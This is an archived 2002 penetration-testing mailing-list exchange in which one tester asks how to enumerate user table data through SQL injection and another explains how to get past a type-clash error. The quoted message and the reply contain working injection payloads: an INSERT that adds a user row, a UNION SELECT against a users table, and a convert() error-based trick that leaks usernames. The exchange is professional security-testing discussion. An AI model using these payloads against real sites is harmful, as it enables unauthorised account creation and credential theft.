----- Original Message ----- From: "Gary O'leary-Steele" <GaryO@sec-1.com> To: <pen-testat_private> Sent: Thursday, May 09, 2002 12:47 PM Subject: sql table data enumeration help please. > www.target.comUserName='insert into > tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy, > CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App > ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address > 2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31 > 2000 > 8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar > y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113 > 1234567','sig','123','456','ls287sr','01132297541',1)-- > Did you get an error message of some kind? Try using a semicolon after the username close quote and doing the INSERT in its own line. > In an attempt to gain access to data held with the username and password > fields I have tried > > www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from > tblusers where username >'a'--&password=hacker > > but get "Operand type clash: uniqueidentifier is incompatible with int" This usually means that the column that you have use to inject (the ninth, in this case) is an int column in the original SELECT statement. The UNION SELECT column must have the same data type. Try using the convert() hack to get around this whole issue, like this: username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM tblUsers WHERE Username > 'a')) + ''-- You should get an error message back complaining about type conversion, which includes the returned value from your subselect. Kevin. SPI Dynamics, Inc. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri May 10 2002 - 09:07:19 PDT